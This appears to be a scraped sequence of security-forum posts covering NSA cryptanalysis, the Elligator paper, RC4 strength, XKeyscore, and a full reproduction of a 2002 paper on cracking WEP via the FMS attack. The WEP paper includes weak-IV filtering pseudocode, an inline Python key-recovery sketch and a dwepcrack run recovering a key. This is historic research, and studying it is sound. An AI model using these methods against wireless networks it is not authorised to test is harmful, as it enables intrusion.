here is Google, which deploys Perfect Forward Secrecy for many of its connections, so key theft would not work here. To deal with this the NSA would have to subvert the software or break the encryption in some other way. Posted by Matthew Green at 11:27 PM Sursa: A Few Thoughts on Cryptographic Engineering: On the NSA
  9. Elligator: Elliptic-curve points indistinguishable from uniform random strings

Daniel J. Bernstein (Department of Computer Science, University of Illinois at Chicago, Chicago, IL 60607–7045, USA, and Technische Universiteit Eindhoven; djb@cr.yp.to), Anna Krasnova (Privacy & Identity Lab, Institute for Computing and Information Sciences, Radboud University Nijmegen, Heyendaalseweg 135, 6525 AJ Nijmegen, The Netherlands; anna@mechanicalmind.org), Tanja Lange (Department of Mathematics and Computer Science, Technische Universiteit Eindhoven, P.O. Box 513, 5600 MB Eindhoven, The Netherlands; tanja@hyperelliptic.org)

ABSTRACT Censorship-circumvention tools are in an arms race against censors. The censors study all traffic passing into and out of their controlled sphere, and try to disable censorship-circumvention tools without completely shutting down the Internet. Tools aim to shape their traffic patterns to match unblocked programs, so that simple traffic profiling cannot identify the tools within a reasonable number of traces; the censors respond by deploying firewalls with increasingly sophisticated deep-packet inspection. Cryptography hides patterns in user data but does not evade censorship if the censor can recognize patterns in the cryptography itself. In particular, elliptic-curve cryptography often transmits points on known elliptic curves, and those points are easily distinguishable from uniform random strings of bits. This paper introduces high-security high-speed elliptic-curve systems in which elliptic-curve points are encoded so as to be indistinguishable from uniform random strings.

Slides: http://cr.yp.to/talks/2013.05.31/slides-dan+tanja-20130531-4x3.pdf
Paper: http://cr.yp.to/elligator/elligator-20130527.pdf
  10. Nytro

    I'm buying root

    There is the RST Market category for that.
  11. I can't tell from the pictures what it's about. I also have an ab bench; I think I paid around 80 RON for it, probably the cheapest one, some "Active" model. I don't think it helps much whether it inclines or not. Practically, the best ab exercises aren't done on a bench anyway, but lying down with your legs at 90 degrees.
  12. What do you think? At 128 bits we have 4 billion * 4 billion * 4 billion * 4 billion keys, that is, a 39-digit number: [340,282,366,920,938,463,463,374,607,431,768,211,456]. Trying that many combinations seems pretty hard, even for millions of CPUs/GPUs. Let's assume we can crack 2^64 [18,446,744,073,709,551,616] keys per second, i.e. 18 billion billion keys per second. That still leaves just as many seconds of cracking... So a brute-force attack, mathematically, fails. However, there are other attacks: https://en.wikipedia.org/wiki/RC4#Security I'm interested in this especially for SSL. Google, Facebook, Twitter and probably many others use SSL with 128-bit RC4, which nowadays is said to be weak/very weak. What do you think? I'd like some technical arguments. If you can also bring some papers, that's perfect.
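To put the brute-force estimate above into perspective, here is a quick back-of-the-envelope check (plain arithmetic, using only the numbers already in the post):

    keys = 2 ** 128              # size of the 128-bit RC4 keyspace
    rate = 2 ** 64               # hypothetical keys tested per second
    seconds = keys // rate       # 2 ** 64 seconds of work remain
    years = seconds / (365.0 * 24 * 3600)
    print("%d seconds, roughly %.1e years" % (seconds, years))   # ~5.8e11 years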
  13. NSA's (and GCHQ) Decryption Capabilities: Truth and Lies by Axelle Apvrille | September 06, 2013 Edward Snowden has revealed new information concerning the cryptographic capabilities of the NSA and GCHQ (TheGuardian, ProRepublica, leaking documents…). The CryptoGirl was bound to look into that topic Let’s go straight to the point and answer simple questions. Is cryptography unsecure? No, I don’t think so. Basically, cryptography is maths (prime numbers, finite fields, polynomials…), and maths are solid science with proofs and demonstrations. Cryptographic algorithms are only seldom broken (e.g MD5). What’s quite often “broken” are implementations, because implementations are imperfect representation of maths. Vulnerabilities range from implementations bugs (buffer overflows etc) to side channel attacks (i.e attacks based on the physical properties of the implementation such as differential power analysis, timing attacks…). Don’t believe me? This opinion of mine is backed by Bruce Schneier, who had access to NSA’s documents: ”They’re doing it primarily by cheating, not by mathematics.”. Yes, but they seem to be able to defeat SSL! Yes. Note that SSL is a security protocol, not a cryptographic algorithm. The documents released by Snowden confirms our fears regarding SSL. As we said in our previous blog, we believe they do it by getting private keys of given domains or performing man-in-the-middle attacks. They could also be using attacks such as BEAST, CRIME) or BREACH. SSL is so widely deployed that there is much peer review of the protocol (good), but also new vulnerabilities are exposed each year at security conferences. It seems quite likely that the NSA is aware of those vulnerabilities, perhaps even with a few 0-days. enigma crypto rotor Image courtesy of LaMenta3 via Flickr. Matthew Green says Microsoft CryptoAPI and OpenSSL are probably among the SSL libraries the NSA is the most likely to break into, and I agree with him. In particular, a few years ago I remember that OpenSSL checked certificate chains only up to 9 levels. Certificates for a given entity are issued by a higher authority, and the higher authority’s certificate is issued by an even higher authority. That’s the chain of trust. So, if you have 10 certificates in your chain, OpenSSL was unable to check the chain and you might claim to be God and would be trusted This was a documented issue, I haven’t checked if it has been fixed since. By the way, Bruce Schneier recommends usage of TLS (for those who don’t know, TLS is like “SSL 3.1”, it’s a newer version of SSL). It’s certainly better than SSL in terms of security, but I wouldn’t bet on it as there are (nearly) as many vulnerabilities. The NSA has supercomputers and excellent cryptographers. They can break the RSA algorithm I agree with the first sentence and disagree with the second Sure, they have powerful computers and cryptographers, but that’s not enough to break the RSA algorithm with 2048-bit keys (for instance, this is used in GPG). You need huge computational power to brute force RSA 2048. Currently, the RSA Factoring Challenge record is set to RSA 768, and that’s already tremendous work. I don’t think the NSA can do much better, and I don’t think they have better cryptographers than those of the entire world. People like Shamir, Rivest, Lenstra, Preneel, Coron, Boneh etc are just exceptional, and I would not think the NSA can influence such a diverse panel of scientists. 
In the specific case of RSA, however, note that improper usage or implementations may be insecure. For instance, signing with RSA 1024 with PKCS#1 and a low exponent is not safe. So, if you use your crypto library (OpenSSL, BouncyCastle etc) with those settings, too bad. Note that it’s not that RSA 1024 is insecure, but that particular combination. All cryptographic algorithms are designed to work in a specific well-designed context. If you use them outside that context, their security may fall apart. As developers say, RTFM The slides say they can do it! No. The information I read in the Guardian’s article in no way states the NSA has the ability to break RSA, nor AES etc. They say that “cryptanalytic capabilities are now coming on line” or that they have “groundbreaking capabilities”, which is far too vague. True, I haven’t had access to the full set of slides, so I might be missing something important. However, still, I would not trust those slides fully. Why? Because they don’t sound like technical slides from a cryptographer. Would a cryptographer write he has “groundbreaking capabilities”? No. That’s not the way cryptographers talk. They’d rather say “Breakable in o(2^n)” or something like that For me, the slides emanate from some high level manager. I guess all of us have already seen slides of products which actually do not really correspond to reality, huh? The NSA influences standards and puts backdoors in applications Yes, I believe this is possible. Matthew Green summarized it very well: “Cryptographers have always had complicated feelings about NIST, and that’s mostly because NIST has a complicated relationship with the NSA.” I however wonder exactly which 2006 standard the Guardian refers to. My guess would be that the same applies to (some) RFCs and IEEE standards such as P1363. Elliptic curve choices are indeed somewhat obscure and could typically have been influenced by the NSA. This is also in line with Bruce Schneier’s recommendation “Prefer conventional discrete-log-based systems over elliptic-curve systems; the latter have constants that the NSA influences when they can.” As for putting backdoors into programs, to some extent, I can personally guarantee this is true - and not only in the US! Some 15 years ago (waow…), I was a junior developer working on quite well-known encryption product. To comply with the French law and be able to commercialize the product, we had absolutely no other choice than to embed a backdoor for the French government. That backdoor enabled them to decrypt the session key and hence any document encrypted with the tool. I remember the product featured a label like “Approved by SCSSI” (French’s former SSI entity) which, in practice, meant it held the backdoor. In France, laws around cryptography are now less restrictive, but this is just to say I would not be surprised the US asks for key escrows. What tools can I use? Bruce Schneier provides several recommendations. See also this document. It’s also worth to have a look at Prism-break. I complement them with a table below of what I think - personal opinion - is secure or not. Unfortunately, “green” does not mean it is guaranteed to be secure. For instance, the implementation may be flawed. But it’s better than orange… – the Crypto Girl Sursa: Fortinet Blog | News and Threat Research NSA's (and GCHQ) Decryption Capabilities: Truth and Lies + https://www.schneier.com/blog/archives/2013/09/conspiracy_theo_1.html
  14. Practical Exploitation of RC4 Weaknesses in WEP Environments

February 22, 2002 by David Hulton <h1kari@dachb0den.com> - (c) Dachb0den Labs 2002
[http://www.dachb0den.com/projects/bsd-airtools.html]

1. Introduction

This document will give a brief background on 802.11b based WEP weaknesses and outline a few additional flaws in rc4 that stem off of the concepts outlined in "Weaknesses in the Key Scheduling Algorithm of RC4" (FMS) and "Using the Fluhrer, Mantin, and Shamir Attack to Break WEP" (SIR) and describes specific methods that will allow you to optimize key recovery. This document is provided as a conceptual supplement to dweputils, a wep auditing toolset, which is part of the bsd-airtools package provided by Dachb0den Labs. The basic goal of the article is to provide technical details on how to effectively implement the FMS attack so that it works efficiently with both a small amount of iv collection time as well as cracking and processing time and to provide details on how other pseudo random generation algorithm (prga) output bytes reveal key information.

2. Background

WEP is based on RSA's rc4 stream cipher and uses a 24-bit initialization vector (iv), which is concatenated with a 40-bit or 104-bit secret shared key to create a 64-bit or 128-bit key which is used as the rc4 seed. Most cards either generate the 24-bit iv using a counter or by using some sort of pseudo random number generator (prng). The payload is then encrypted along with an appended 32-bit checksum and sent out with the iv in plaintext as illustrated:

     0                   1                   2                   3
     0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    |                                                               |
    |                         802.11 Header                         |
    |                                                               |
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    |     IV[0]     |     IV[1]     |     IV[2]     |    Key ID     |
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    | . . . . . . SNAP[0] . . . . . | . . . . . SNAP[1] . . . . . . |
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    | . . . . . . SNAP[2] . . . . . | . . . . Protocol ID . . . . . |
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
    | . . . . . . . . . . . . . Payload . . . . . . . . . . . . . . |
    | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    | . . . . . . . . . . . 32-bit Checksum . . . . . . . . . . . . |
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

    . - denotes encrypted portion of packet

After the data is sent out, the receiver simply concatenates the received iv with their secret key to decrypt the payload. If the checksum checks out, then the packet is valid.

2.1. Current Cracking Methods

Essentially, most of the wep attacks out there these days are either based on brute forcing methods, often times including optimizations based on how the key is generated or by using a wordlist, or through statistical analysis of initialization vectors (ivs) and their first rc4 output byte, to setup conditions in the rc4 key scheduling algorithm (ksa) that reveal information about particular bytes in the secret key.

2.1.1. Brute Forcing

Brute forcing has been proven to be an effective method of breaking wep, mainly thanks to all of the work done by Tim Newsham.
This method basically consists of trying to decrypt the encrypted payload of a captured 802.11b packet using a set of keys and verifying the validity by seeing if the 32-bit checksum checks out. In most cases, if the key checks out it is important to check it with another packet to make sure the key is actually valid, since many times the packet can be decrypted with an invalid key and the checksum will be valid. This mode of attack generally only requires 2 packets. Tim Newsham's most effective cracking method stems off of the weaknesses in the password based key generation algorithm used by most 40-bit cards and access points. By taking advantage of this weakness, it reduces the 40-bit keyspace down to 21-bit, which is trivial to crack (20-40 seconds with most current-day machines). Also, wordlist attacks prove almost equally effective on both 40-bit and 104-bit 802.11b networks, provided you have a decent list of commonly used passphrases. Even without using these optimizations, you can still exhaust the entire 40-bit keyspace in roughly 45-days on a decent machine, or in a very reasonable amount of time using a distributed network of machines. Although this mode of attack can be applied to many networks out there, it fails to be able to attack a properly secured 104-bit network, since the amount of time required to brute force 104-bit is generally longer than an attacker's great-grandchildren would want to wait. 2.1.2. FMS Attack Up until now, all open source wep cracking utilities that use the FMS Attack have used an extremely limited mode of operation as described in FMS in Section 7.1 "IV Precedes the Secret Key", and is also published by Wagner in Wag95, which involves only looking for ivs that match: (A + 3, N - 1, X) This is a particular condition that works almost all of the time and is not dependent on the preceding keys. However, as described later on in FMS in Section A "Applying The Attack to WEP-like Cryptosystems", they recommend that you use the following equation on the S permutation immediately after the KSA to determine if an iv is weak: X = S{B + 3}[1] < B + 3 X + S{B + 3}[X] = B + 3 This equation uncovers many more ivs than the 256 per key that most implementations currently use. This was made obvious in SIR in Section 4.1 "Choosing IVs", but wasn't thoroughly expanded on about how to effectively use a pool of logged ivs to successfully perform this attack in a reasonable amount of time. The main dilemmas with applying this equation to all of the IVs that you collect are that you have to check all of your logged ivs at least once for every key byte that you try, and that it takes a considerable amount of resources to apply this algorithm to a set of 2,000,000 ivs. So, not only do you have to do a large amount of processing, but also for an extremely large set of possibilities. Also, all of the current implementations only attack the 1st rc4 output byte, mainly because it is the one that provides the most accurate information about the key bytes. However, by attacking the other bytes, it can also provide clues, although minute, to the static key that was used. This can sometime provide enough statistical data to derive key bytes in cases when you aren't able to collect a large amount of captured data, and have more time to spend processing. 3. Additional Flaws in the KSA The main flaw with rc4 that hasn't been thoroughly expanded, is using information provided by other bytes in the prga output stream. 
This attack is similar to the FMS attack, but requires additional processing because you have to also emulate portions of the pseudo random generation algorithm (prga) to determine if an iv gives out key information in byte A. However, the bytes that you can attack using this method directly depend on the bytes of the key you have already recovered and are extremely hard to predict without excessive processing. To demonstrate this, I will first provide background on the current common mode of attack which attacks the first output byte and then show how it can be expanded to other bytes. 3.1. Attacking the First Byte The first byte attack works based on the fact that you can simulate part of the ksa using the known iv and derive the values of elements in the S permutation that will only change 1 - (e ** -X) of the time, where X is the number of S elements that your attack depends on. This can be illustrated as follows when attacking the first byte in the secret key (SK): Definitions: KSA(K) Initialization: For i = 0 ... N - 1 S[i] = i j = 0 Scrambling: For i = 0 ... N - 1 j = j + S[i] + K[i mod l] Swap(S[i], S[j]) PRGA(K) Initialization: i = 0 j = 0 Generation Loop: i = i + 1 j = j + S[i] Swap(S[i], S[j]) Output z = S[S[i] + S[j]] - For demonstration purposes N = 16, although it is normally 256 - Also, all addition and subtraction operations are carried out modulo N and negative results are added with N so results are always 0 <= x < N. Simulation: let B = 0 - byte in K that we are attacking let IV = B + 3, f, 7 let SK = 1, 2, 3, 4, 5 let K = IV . SK let l = the amount of elements in K assume that no S elements get swapped when i > B + 3 KSA - K = 3, f, 8, 1, 2, 3, 4, 5 Known Portion: 0 1 2 3 4 5 6 7 8 9 a b c d e f j S[i] K 3 0 i = 0, j = 0 + 0 + 3 = 3 0 1 i = 1, j = 3 + 1 + f = 3 d 2 i = 2, j = 3 + 2 + 8 = d Unknown Portion: f 1 i = 3, j = d + 1 + 1 = f - Note that S[B + 3] always contains information relating to SK[B], since SK[B] is used to calculate j. PRGA - S = 3, 0, d, f, 4, 5, 6, 7, 8, 9, a, b, c, 2, e, 1 Unknown Portion: 0 1 2 3 4 5 6 7 8 9 a b c d e f j S[i] S[i] S[j] 3 0 d f 4 5 6 7 8 9 a b c 2 e 1 Unknown KSA Output 0 3 i = 1, j = 0 + 0 = 0, z = S[0 + 3] = f In this instance, f will be output as the first PRGA byte, which is in turn xor'ed with the first byte of the snap header. The first byte of the snap header is almost always 0xaa, so we can easily derive the original f by simply xor'ing the first byte in our encrypted payload with 0xaa. To reverse the f back into the first byte of the SK that was used to generate it, we just iterate through the KSA up until the point where we know the j and S[i] values that were used to derive the f as provided in the previous demonstration. Once the j and S[i] values are derived, we can easily reverse it to SK[B] as illustrated: Definitions: let S{-1}[Out] be the location of Out in the S permutation let Out be z in the first iteration of the PRGA assume values in Known Portion of KSA from where i = 2 SK[B] = S{-1}[Out] - j - S[i + 1] Application: SK[B] = S{-1}[f] - c - S[3] = f - d - 1 = 1 This method provides us with the correct key roughly e ** -3 =~ 5% of the time, and sometimes e ** -2 =~ 13% of the time in some cases when we only rely on 2 elements in the S permutation staying the same. As you can see in the ksa and prga simulation above, we only rely on elements 0, 1, and 3 not changing for the output byte to be reliable, so the probability of our output byte being f is 5%. 
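To make the first-byte attack above concrete, here is a minimal sketch in Python of one FMS "vote" (names are illustrative; it assumes, as described above, that the first keystream byte is recovered by XORing the first encrypted payload byte with the 0xaa SNAP header byte, and that the candidate returned for each weak iv is tallied over many ivs before picking the most frequent value):

    def fms_vote(iv, first_keystream_byte, known_sk=(), N=256):
        """Return a candidate for secret key byte SK[B] (B = len(known_sk)),
        or None if this iv does not satisfy the resolved condition."""
        B = len(known_sk)
        key = list(iv) + list(known_sk)     # K = IV . SK[0..B-1], the part we know
        S = list(range(N))
        j = 0
        # Run only the first B+3 steps of the KSA, which use key bytes we know.
        for i in range(B + 3):
            j = (j + S[i] + key[i]) % N
            S[i], S[j] = S[j], S[i]
        # Resolved condition from the paper: X = S[1] < B+3 and X + S[X] = B+3.
        x = S[1]
        if x >= B + 3 or (x + S[x]) % N != B + 3:
            return None
        # If the relevant S elements survive the remaining KSA steps (~5% chance),
        # the first output byte z equals S[B+3] after step B+3, so invert that step:
        # SK[B] = S^-1[z] - j - S[B+3]  (mod N)
        return (S.index(first_keystream_byte) - j - S[B + 3]) % N

Tallying the returned candidates over many weak ivs and taking the most frequent value makes the correct byte stand out; the routine is then re-run with the recovered byte appended to known_sk to attack the next key byte.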
By collecting many different SK[B] values the correct SK[B] values should become more evident as more data is collected. Additionally, once we determine the most probable value for the first byte in the secret key, we can apply the same algorithm to cracking the next byte in the secret key, and continue until we have cracked the entire secret key. In most implementations this method is combined with brute forcing so the odds don't have to be perfect in order to recover the key. 3.2. Attacking Additional Output Bytes This section will demonstrate a set of new unique ivs that provide clues to various bytes in the secret key and in some cases with greater probability than the first bytes. I will first demonstrate what happens when rc4 encounters one of these ivs, and then provide methods for detecting them. 3.2.1. RC4 Encounters a 2nd-Byte Weak IV In this demonstration, I will use a weak iv that attacks the 2nd byte and show how certain ivs setup the S permutation so that secret key information is revealed in the 2nd byte of output. This method also applies to other output bytes and can be expanded depending on which secret key byte you are attacking. Here is what happens: Simulation: let B = 0 - byte in K that we are attacking let IV = 4, c, c let SK = 1, 2, 3, 4, 5 let K = IV . SK assume that no S elements get swapped when i > B + 3 KSA - K = 4, c, c, 1, 2, 3, 4, 5 Known Portion: 0 1 2 3 4 5 6 7 8 9 a b c d e f j S[i] K 4 0 i = 0, j = 0 + 0 + 4 = 4 1 i = 1, j = 4 + 1 + c = 1 f 2 i = 2, j = 1 + 2 + c = f Unknown Portion: 3 i = 3, j = f + 3 + 1 = 3 PRGA - S = 4, 1, f, 3, 0, 5, 6, 7, 8, 9, a, b, c, d, e, 2 Unknown Portion: 0 1 2 3 4 5 6 7 8 9 a b c d e f j S[i] S[i] S[j] 4 1 f 3 0 5 6 7 8 9 a b c d e 2 Unknown KSA Output 1 i = 1, j = 0 + 1 = 1, z = S[1 + 1] = f f 4 i = 2, j = 1 + f = 0, z = S[f + 4] = 3 Then, since we also often times know that the second byte of the snap header is 0xaa, we can determine the 2nd byte of prga output and reverse it back to the original key, as demonstrated: SK[B] = S{-1}[3] - f - S[3] = 3 - f - 3 = 1 As you can see, this particular iv will setup the ksa and prga so that the second output byte provides information about the first byte of our key in almost every situation. Additionally, it relies on elements 0, 1, 2, and 3 not changing for the second byte to be accurate, so it will only be correct e ** -4 =~ 2% of the time. Additionally, in cases where the previous output bytes are derived from dependent elements, we can check to see if the actual outputted byte matches up and determine if the output we are receiving has been tampered with. In addition, if the output matches up, it greatly increases our odds since we now rely on less elements. In this particular case, if the first output byte checked out, it would increase our probability with the 2nd byte to e ** -2 =~ 13%. 3.2.2. Finding Weak IVs for Additional Output Bytes The main problem with attacking additional output bytes is determining if an iv will reveal part of the secret key in a particular output byte, and also determining if the probabilities are good enough to even consider it. How we can detect if an iv is vulnerable to this sort of attack is similar to the first byte attack, but it requires looping through the prga up until i = (A + 1) where A = the offset in the prga stream of the byte you know the value for. 
For each iteration of the prga loop, if there are any instances where j or i >= B + 3, we must discard the iv, since then we are relying on elements in the S permutation that will most likely change. This can be accomplished by modifying the prga algorithm so that it is similar to:

  PRGA(K)
    Initialization:
      For i = 0 ... N - 1
        P[i] = 0
      P[B + 3] = 1
      i = 0
      j = 0
    Generation Loop:
      While i < A + 1
        i = i + 1
        j = j + S[i]
        If i or j >= B + 3 Then Fail
        Swap(S[i], S[j])
        Output z = S[S[i] + S[j]]
        P[i] = 1
        P[j] = 1
    Verification:
      If S[i] + S[j] = B + 3 Then Success
    Probability Analysis:
      j = 0
      For i = 0 ... N - 1
        If P[i] > 0 Then j = j + 1

This algorithm works almost identically to the equation for determining if an iv is vulnerable to the first byte attack, and it can be expanded to detect ivs that reveal keys in any byte of the prga output. You can then weigh the probabilities and determine if it is worth considering. In tests, this method doesn't prove entirely useful, mainly due to the amount of processing required to determine if certain ivs have this property. Since each iv has to be checked against each previous secret key byte that you try, it would probably be most practical to derive a table of vulnerable ivs in advance, so it doesn't require much work during key recovery. In most cases it'd be more practical to collect more ivs and only use the first bytes to perform key recovery; however, in cases where you have a limited set of sample data, it could greatly reduce the time required for recovery.

4. Implementation

This section will focus on practical methods for making use of all of the 1st byte weak ivs without hindering performance. It will also cover optimizations for applying brute forcing and fudging methods to greatly reduce cracking time. The result of the optimizations will allow you to perform key recovery with only 500,000-2,000,000 packets and < 1 minute of processing time. Although it is mentioned in SIR that they were able to crack wep with a similar number of packets, this mode of attack does not require that the wep key be ascii characters, and it isn't dependent on what key generator the victim used.

4.1. Filtering Weak IVs

The main problem with attacking wep using all of the first byte weak ivs is that the equation specified in FMS has to be applied to each of the ivs for every key that you try. Since you'll often have a total of 2,000,000 packets that you've collected and thousands of keys to try before you find the correct one, it has thus far been impractical to use this mode of attack, since it requires a large amount of memory as well as processing resources. The way I have managed to get around this dilemma is by analyzing the patterns of weak ivs and how they are related to the key bytes they rely on. This is the basic pattern that I've found.
Definitions:

  let x = iv[0]
  let y = iv[1]
  let z = iv[2]
  let a = x + y
  let b = (x + y) - z

Byte 0:
  x = 3 and y = 255
  a = 0 or 1 and b = 2

Byte 1:
  x = 4 and y = 255
  a = 0 or 2 and b = SK[0] + 5

Byte 2:
  x = 5 and y = 255
  a = 0 or 3 and b = SK[0] + SK[1] + 9
  a = 1 and b = 1 or 6 + SK[0] or 5 + SK[0]
  a = 2 and b = 6

Byte 3:
  x = 6 and y = 255
  a = 0 or 4 and b = SK[0] + SK[1] + SK[2] + 14
  a = 1 and b = 0 or SK[0] + SK[1] + 10 or SK[0] + SK[1] + 9
  a = 3 and b = 8

Byte 4:
  x = 7 and y = 255
  a = 0 or 5 and b = SK[0] + SK[1] + SK[2] + SK[3] + 20
  a = 1 and b = 255 or SK[0] + SK[1] + SK[2] + 15 or SK[0] + SK[1] + SK[2] + 14
  a = 2 and b = SK[0] + SK[1] + 11 or SK[0] + SK[1] + 9
  a = 3 and b = SK[0] + 11
  a = 4 and b = 10

This pattern can then easily be expanded into an equation that covers a range independent of what SK values you have. As a result, you have a distribution pattern similar to the one shown below:

  Secret Key Byte:  0  1  2  3  4  5  6  7  8  9  a  b  c
                    +  +  +  +  +  +

  a values (0 - d), one row per value of a:

    0:  8 16 16 16 16 16 16 16 16 16 16 16 16
    1:  8 16 16 16 16 16 16 16 16 16 16 16
    2: 16  8 16 16 16 16 16 16 16 16 16
    3: 16  8 16 16 16 16 16 16 16 16
    4: 16  8 16 16 16 16 16 16 16
    5: 16  8 16 16 16 16 16 16
    6: 16  8 16 16 16 16 16
    7: 16  8 16 16 16 16 16
    8: 16  8 16 16 16 16
    9: 16  8 16 16 16
    a: 16  8 16 16
    b: 16  8 16
    c: 16  8
    d: 16  8

   8 - 8-bit set of weak ivs
  16 - 16-bit set of weak ivs
   + - 2 additional x and y dependent 8-bit weak ivs

From this, we can determine a rough estimate of how many total weak ivs exist for each key byte. It can also be determined using the following equation:

  let ? : be the conditional operator
  let MAX(x, y) be x > y ? x : y

  ((B mod 2 ? MAX(B - 2, 0) + 2 : B + 1) * (2 ** 16)) +
  (((B mod 2 ? 0 : 2) + (B > 1 ? 1 : 0) + 1) * (2 ** 8))

However, our real objective is to determine an algorithm that allows us to filter out weak ivs based on the secret key byte that they can attack, so that we can narrow our 2,000,000 element table down to a reasonable size that's easier to search. This can be accomplished by using a simple algorithm similar to:

  let l = the amount of elements in SK

  i = 0
  For B = 0 ... l - 1
    If (((0 <= a and a < B) or (a = B and b = (B + 1) * 2)) and
        (B % 2 ? a != (B + 1) / 2 : 1)) or
       (a = B + 1 and (B = 0 ? b = (B + 1) * 2 : 1)) or
       (x = B + 3 and y = N - 1) or
       (B != 0 and !(B % 2) ? (x = 1 and y = (B / 2) + 1) or
        (x = (B / 2) + 2 and y = (N - 1) - x) : 0)
    Then ReportWeakIV

This algorithm results in catching the following distribution of ivs:

  Byte   # of IVs   Probability
   0         768    0.00004578
   1      131328    0.00782776
   2      197376    0.01176453
   3      197120    0.01174927
   4      328703    0.01959223
   5      328192    0.01956177
   6      459520    0.02738953
   7      459264    0.02737427
   8      590592    0.03520203
   9      590336    0.03518677
   a      721664    0.04301453
   b      721408    0.04299927
   c      852736    0.05082703

These counts differ slightly from the previous weak iv estimation equation, since some ivs in the pattern overlap. By sorting these IVs into tables, you can very easily narrow down the number of ivs to search for each cracking operation to a maximum of 852,736 ivs, or only around 101,654 when supplied with a 2,000,000 packet capture file. This effectively reduces the search time for each key by a factor of at least 20.

4.2. Fudging

When trying to recover keys using a capture file that doesn't statistically provide enough immediate information to determine the secret key, it is common to perform a brute force based on the most probable key bytes. Up until now the fudge, or breadth, has been implemented as a static number that specifies the range to search for each key byte.
However, with > 2,000,000 samples and a large number of weak ivs for each byte, the probability that the correct key will be the most probable one gets greater as you traverse through each byte. An estimate of the probabilities for this is outlined below:

  Byte   # of IVs   Probability
   0        768     0.00004578
   1        768     0.00004578
   2       2304     0.00013732
   3       1792     0.00010681
   4       3072     0.00018311
   5       2560     0.00015259
   6       4096     0.00024414
   7       3584     0.00021362
   8       5120     0.00030518
   9       4608     0.00027466
   a       6144     0.00036621
   b       5632     0.00033569
   c       6656     0.00039673

Therefore, when attempting to brute force based on a 2,000,000 sample set, your IVs will most likely be near:

  Byte   # of IVs   # of Correct Keys
   0        92          5
   1        92          5
   2       275         14
   3       214         11
   4       366         18
   5       305         15
   6       488         24
   7       427         21
   8       610         30
   9       549         27
   a       732         36
   b       671         33
   c       793         39

Therefore, it's most likely that once you reach byte 2, the key byte that seems most probable actually is. This means that fudging is most likely not required, or at the least should be reduced, the farther you move through the bytes. This reduces the brute forcing time required considerably, since it is now only necessary to fudge the first few bytes of the key, and the rest is no longer necessary. I have found that in most cases, because of this property of weak ivs, it requires considerably fewer packets than 2,000,000 to recover the key, and in some cases you don't even require any statistics for the first couple of bytes of the secret key to perform this attack in a very reasonable amount of time.

5. Results

Using the outlined modifications, I've managed to crack wep using between 500,000 and 2,000,000 packets in under a minute; most of that time is spent reading in the packets. Here is an example of a successful attack using far fewer than the 60 required ivs per key and only ~ 500,000 packets:

  h1kari@balthasar ~/bsd-airtools/dweputils/dwepcrack$ ./dwepcrack -w ~/log
  * dwepcrack v0.3a by h1kari <h1kari@dachb0den.com> *
  * Copyright (c) Dachb0den Labs 2002 [http://dachb0den.com] *
  reading in captured ivs, snap headers, and samples... done
  total packets: 500986
  calculating ksa probabilities...
   0: 22/768 keys (!)
   1: 3535/131328 keys (!)
   2: 5459/197376 keys (!)
   3: 5424/197120 keys (!)
   4: 9313/328703 keys (!)
  (!) insufficient ivs, must have > 60 for each key (!)
  (!) probability of success for each key with (!) < 0.5 (!)
  warming up the grinder...
  packet length: 44
  init vector: 58:f7:26
  default tx key: 0
  progress: ....................................
  wep keys successfully cracked!
   0: xx:xx:xx:xx:xx *
  done.

6. Conclusions

The best solution for securing your wireless networks is using traditional wireless security to its fullest, but not relying on it. Manually enter your wep keys and don't use the key generator (or use dwepkeygen ;-Q), change your wep keys frequently, use mac filtering and shared key authentication, and label your wireless network as untrusted (and no, I don't necessarily mean set your ssid to "untrusted"). Wireless networks, just like any other networks, are proportionately insecure to the stupidity of the person managing them.

References

[1] Fluhrer, S., Mantin, I. and Shamir, A. - Weaknesses in the Key Scheduling Algorithm of RC4.
[2] Stubblefield, A., Ioannidis, J. and Rubin, A. - Using the Fluhrer, Mantin, and Shamir Attack to Break WEP.
[3] Newsham, T. - Cracking WEP Keys. Presented at Black Hat 2001.

Sursa: http://www.dartmouth.edu/~madory/RC4/wepexp.txt
  15. XKeyscore: NSA’s Surveillance Program

Bhavesh Naik
September 09, 2013

Introduction

The former contractor for the NSA, Edward Snowden, became famous for revealing PRISM, a confidential mass surveillance program run by the U.S. agencies to eavesdrop on any electronic media. The whole world realized that Big Brother is real and, yes, he is watching you. It is no longer fiction.

So what is XKeyscore, exactly? It’s a tool that can scour all things from the Internet for surveillance purposes. The purpose of XKeyscore is to allow analysts to search the metadata as well as the contents of email and other Internet activity, such as browser history. Analysts can also search by name, telephone number, IP address, keywords, and the language in which the Internet activity was conducted or the type of browser used.

According to the slides published, XKeyscore is:

- A DNI (digital network intelligence) exploitation system/analytic framework.
- Performs strong (e.g., email) and soft (e.g., content) selection. In an interview in June, Edward Snowden elaborated on his statement about being able to read any individual’s email if he had their email address. He said the claim was based in part on the email search capabilities of XKeyscore, which Snowden says he was authorized to use while working as a Booz Allen contractor for the NSA. One of the top-secret documents describes how the program searches within the “bodies of emails, web pages and documents,” including the “To, From, CC, BCC lines” and “Contact-Us” pages on websites.
- Provides real-time activity. Beyond emails, the XKeyscore system allows analysts to monitor a virtually unlimited array of other Internet activities, including those within social media. The DNI presenter enables an analyst using this tool to read the content of Facebook chats or private messages.
- A “rolling buffer” of ~3 days of ALL unfiltered data seen by XKeyscore: it stores full-take data at the collection site, indexed by meta-data, and provides a series of viewers for common data types.
